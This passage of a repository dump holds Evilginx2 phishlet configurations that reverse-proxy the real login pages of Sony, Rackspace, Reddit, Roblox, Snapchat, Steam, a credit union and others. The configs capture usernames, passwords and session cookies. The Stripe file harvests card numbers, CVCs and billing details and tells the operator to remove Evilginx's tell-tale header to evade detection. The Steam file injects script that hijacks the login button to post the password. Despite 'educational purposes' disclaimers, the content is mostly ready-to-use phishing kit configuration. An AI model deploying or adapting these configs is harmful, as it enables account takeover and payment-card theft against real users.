29 | - domain: 'auth.api.sonyentertainmentnetwork.com'
30 | keys: ['JSESSIONID']
31 | - domain: 'id.sonyentertainmentnetwork.com'
32 | keys: ['akacd_pdr-id2-sencom-bdl,opt']
33 |
34 | credentials:
35 | username:
36 | key: 'username'
37 | search: '(.*)'
38 | type: 'post'
39 | password:
40 | key: 'password'
41 | search: '(.*)'
42 | type: 'post'
43 | login:
44 | domain: 'id.sonyentertainmentnetwork.com'
45 | path: '/signin/'
46 |
--------------------------------------------------------------------------------
/phishlet_examples/rackspace.yaml:
--------------------------------------------------------------------------------
1 |
2 | author: '@An0nud4y'
3 | min_ver: '2.3.0'
4 | proxy_hosts:
5 | - {phish_sub: 'login', orig_sub: 'login', domain: 'rackspace.com', session: true, is_landing: true}
6 | - {phish_sub: '', orig_sub: '', domain: 'rackspace.com', session: true, is_landing: false}
7 |
8 | sub_filters:
9 | - {triggers_on: 'login.rackspace.com', orig_sub: 'login', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 | - {triggers_on: 'login.rackspace.com', orig_sub: '', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 |
12 |
13 | auth_tokens:
14 | - domain: 'login.rackspace.com'
15 | keys: ['.*,regexp']
16 | auth_urls:
17 | - ''
18 | credentials:
19 | username:
20 | key: 'name="username"'
21 | search: '(.*)'
22 | type: 'post'
23 | password:
24 | key: 'name="password"'
25 | search: '(.*)'
26 | type: 'post'
27 | login:
28 | domain: 'login.rackspace.com'
29 | path: '/login'
30 |
31 |
--------------------------------------------------------------------------------
/phishlet_examples/reddit.yaml:
--------------------------------------------------------------------------------
1 | author: '@customsync'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
5 | - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
6 | - {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false}
7 | sub_filters:
8 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
9 | - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
10 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
11 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
12 | - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}
13 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
14 | - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
15 | auth_tokens:
16 | - domain: '.reddit.com'
17 | keys: ['reddit_session']
18 | credentials:
19 | username:
20 | key: 'username'
21 | search: '(.*)'
22 | type: 'post'
23 | password:
24 | key: 'password'
25 | search: '(.*)'
26 | type: 'post'
27 | login:
28 | domain: 'www.reddit.com'
29 | path: '/login'
30 |
--------------------------------------------------------------------------------
/phishlet_examples/roblox.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@AN0NUD4Y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'roblox.com', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'roblox.com', session: true, is_landing: false}
9 | - {phish_sub: 'assetgame', orig_sub: 'assetgame', domain: 'roblox.com', session: true, is_landing: false}
10 | - {phish_sub: 'auth', orig_sub: 'auth', domain: 'roblox.com', session: true, is_landing: false}
11 | - {phish_sub: 'metrics', orig_sub: 'metrics', domain: 'roblox.com', session: true, is_landing: false}
12 | - {phish_sub: 'realtime', orig_sub: 'realtime', domain: 'roblox.com', session: true, is_landing: false}
13 | - {phish_sub: 'apis', orig_sub: 'apis', domain: 'roblox.com', session: true, is_landing: false}
14 | - {phish_sub: 'locale', orig_sub: 'locale', domain: 'roblox.com', session: true, is_landing: false}
15 | - {phish_sub: 'accountsettings', orig_sub: 'accountsettings', domain: 'roblox.com', session: true, is_landing: false}
16 | - {phish_sub: 'js', orig_sub: 'js', domain: 'rbxcdn.com', session: true, is_landing: false}
17 | - {phish_sub: 'ecsv2', orig_sub: 'ecsv2', domain: 'roblox.com', session: true, is_landing: false}
18 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
19 | - {phish_sub: 'thumbnails', orig_sub: 'thumbnails', domain: 'roblox.com', session: true, is_landing: false}
20 | - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
21 | - {phish_sub: 'chat', orig_sub: 'chat', domain: 'roblox.com', session: true, is_landing: false}
22 | - {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'roblox.com', session: true, is_landing: false}
23 | - {phish_sub: 'economy', orig_sub: 'economy', domain: 'roblox.com', session: true, is_landing: false}
24 | - {phish_sub: 'friends', orig_sub: 'friends', domain: 'roblox.com', session: true, is_landing: false}
25 |
26 | sub_filters:
27 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'roblox.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
28 | - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'rbxcdn.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
29 |
30 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
31 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
32 | - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
33 |
34 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
35 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
36 | - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
37 |
38 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
39 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
40 | - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
41 |
42 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
43 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
44 | - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
45 |
46 | auth_tokens:
47 | - domain: '.roblox.com'
48 | keys: ['GuestData', '.ROBLOSECURITY','RBXSessionTracker','.*,regexp']
49 | - domain: '.www.roblox.com'
50 | keys: ['gig_canary','gig_canary_ver' ,'.*,regexp']
51 |
52 | auth_urls:
53 | - '/home'
54 | - '/home/.*'
55 | credentials:
56 | username:
57 | key: 'cvalue'
58 | search: '(.*)'
59 | type: 'post'
60 | password:
61 | key: 'password'
62 | search: '(.*)'
63 | type: 'post'
64 | custom:
65 | - key: 'ctype'
66 | search: '(.*)'
67 | type: 'post'
68 |
69 | login:
70 | domain: 'www.roblox.com'
71 | path: '/Login'
--------------------------------------------------------------------------------
/phishlet_examples/snapchat.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@an0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false}
9 | - {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false}
10 | - {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false}
11 |
12 | sub_filters:
13 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
17 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
19 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 | - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 |
23 | auth_tokens:
24 | - domain: '.snapchat.com'
25 | keys: ['sc-a-nonce', '.*,regexp']
26 | - domain: 'accounts.snapchat.com'
27 | keys: ['web_client_id', 'sc-cookies-accepted', 'sc-a-csrf', 'sc-a-session', 'xsrf_token', '.*,regexp']
28 | auth_urls:
29 | - '/accounts/welcome'
30 | credentials:
31 | username:
32 | key: 'username'
33 | search: '(.*)'
34 | type: 'post'
35 | password:
36 | key: 'password'
37 | search: '(.*)'
38 | type: 'post'
39 | login:
40 | domain: 'accounts.snapchat.com'
41 | path: '/accounts/login'
42 |
--------------------------------------------------------------------------------
/phishlet_examples/steam.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@An0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: '', orig_sub: '', domain: 'steamcommunity.com', session: true, is_landing: true}
8 |
9 | sub_filters:
10 | - {triggers_on: 'steamcommunity.com', orig_sub: 'login', domain: 'steamcommunity.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html$
11 |
12 | auth_tokens:
13 | - domain: 'steamcommunity.com'
14 | keys: ['xf_user', 'xf_session']
15 |
16 | credentials:
17 | username:
18 | key: 'username'
19 | search: '(.*)'
20 | type: 'post'
21 | password:
22 | key: 'unenc_password'
23 | search: '(.*)'
24 |
25 | login:
26 | domain: 'steamcommunity.com'
27 | path: '/login/home/'
28 |
29 | js_inject:
30 | - trigger_domains: ["steamcommunity.com"]
31 | trigger_paths: ["/login/home/"]
32 | trigger_params: []
33 | script: |
34 | function onclickListener(){
35 | var submit = document.querySelectorAll('button[type=submit]')[0];
36 | submit.setAttribute("onclick", "sendPass()");
37 | return;
38 | }
39 | function sendPass(){
40 | var password = document.getElementsByName("password")[0].value;
41 | var xhr = new XMLHttpRequest();
42 | xhr.open("POST", '/login/device-based/regular/login/', true);
43 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
44 | xhr.send("unenc_password="+encodeURIComponent(password));
45 | return;
46 | }
47 | setTimeout(function(){ onclickListener(); }, 2500);
48 |
49 |
50 |
51 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
52 | # PLEASE DO NOT MISUSE THIS PHISHLET.
53 |
--------------------------------------------------------------------------------
/phishlet_examples/stripe.yaml:
--------------------------------------------------------------------------------
1 | # Checkout Docs for reference
2 | # https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination
3 |
4 | # Steps to follow to integrate evilginx checkout in original payment checkout page
5 | #
6 | # 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain
7 | # 2) Read docs for other possible issues (Mentioned Above)
8 | # 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website.
9 | # 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user.
10 | #
11 |
12 |
13 |
14 | # Checkout Page -
15 | #
16 | # https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl
17 |
18 |
19 | ## List of SubDomains ---
20 | # https://m.stripe.com
21 | # https://m.stripe.network/
22 | # https://js.stripe.com
23 | # https://q.stripe.com
24 | # https://api.stripe.com/
25 | # https://r.stripe.com/
26 | # https://stripe-camo.global.ssl.fastly.net/
27 | # https://checkout.stripe.com
28 |
29 |
30 |
31 |
32 |
33 | # Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go),
34 | # Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to remove the evilginx header (X-Evilginx)
35 |
36 |
37 | name: 'stripe'
38 | author: '@an0nud4y'
39 | min_ver: '2.4.0'
40 | proxy_hosts:
41 | - {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true}
42 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
43 | - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false}
44 | - {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
45 | - {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
46 | - {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
47 | - {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
48 | - {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false}
49 |
50 | sub_filters:
51 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
52 | - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
53 |
54 | auth_tokens:
55 | - domain: '.stripe.com'
56 | keys: ['.*,regexp']
57 | - domain: 'm.stripe.com'
58 | keys: ['.*,regexp']
59 | - domain: 'stripe.com'
60 | keys: ['.*,regexp']
61 |
62 | credentials:
63 | username:
64 | key: 'card[number]'
65 | search: '(.*)'
66 | type: 'post'
67 | password:
68 | key: 'card[cvc]'
69 | search: '(.*)'
70 | type: 'post'
71 | custom:
72 | - key: 'type'
73 | search: '(.*)'
74 | type: 'post'
75 | - key: 'card[number]'
76 | search: '(.*)'
77 | type: 'post'
78 | - key: 'card[cvc]'
79 | search: '(.*)'
80 | type: 'post'
81 | - key: 'card[exp_month]'
82 | search: '(.*)'
83 | type: 'post'
84 | - key: 'card[exp_year]'
85 | search: '(.*)'
86 | type: 'post'
87 | - key: 'billing_details[name]'
88 | search: '(.*)'
89 | type: 'post'
90 | - key: 'billing_details[email]'
91 | search: '(.*)'
92 | type: 'post'
93 | - key: 'guid'
94 | search: '(.*)'
95 | type: 'post'
96 | - key: 'muid'
97 | search: '(.*)'
98 | type: 'post'
99 | - key: 'sid'
100 | search: '(.*)'
101 | type: 'post'
102 | - key: 'payment_user_agent'
103 | search: '(.*)'
104 | type: 'post'
105 |
106 |
107 | auth_urls:
108 | - '/'
109 | - '/c'
110 |
111 | login:
112 | domain: 'checkout.stripe.com'
113 | path: '/'
114 |
--------------------------------------------------------------------------------
/phishlet_examples/sununion.yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
min_ver: '2.3.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'suncoastcreditunion.com', session: true, is_landing: true}
- {phish_sub: '', orig_sub: '', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
- {phish_sub: 'banking', orig_sub: 'banking', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
sub_filters:
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
- {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
auth_tokens:
- domain: '.suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'banking.suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: '.banking.suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'www.suncoastcreditunion.com'
keys: ['.*,regexp']
auth_urls:
- '/*'
- '/'
credentials:
username:
key: 'memberId'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'www.suncoastcreditunion.com'
path: '/'
--------------------------------------------------------------------------------
/phishlet_examples/supersport.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@An0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'supersport.hr', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'supersport.hr', session: true, is_landing: false}
9 | sub_filters:
10 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
15 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 |
19 |
20 | # i=n(2494); --> i=n(165);
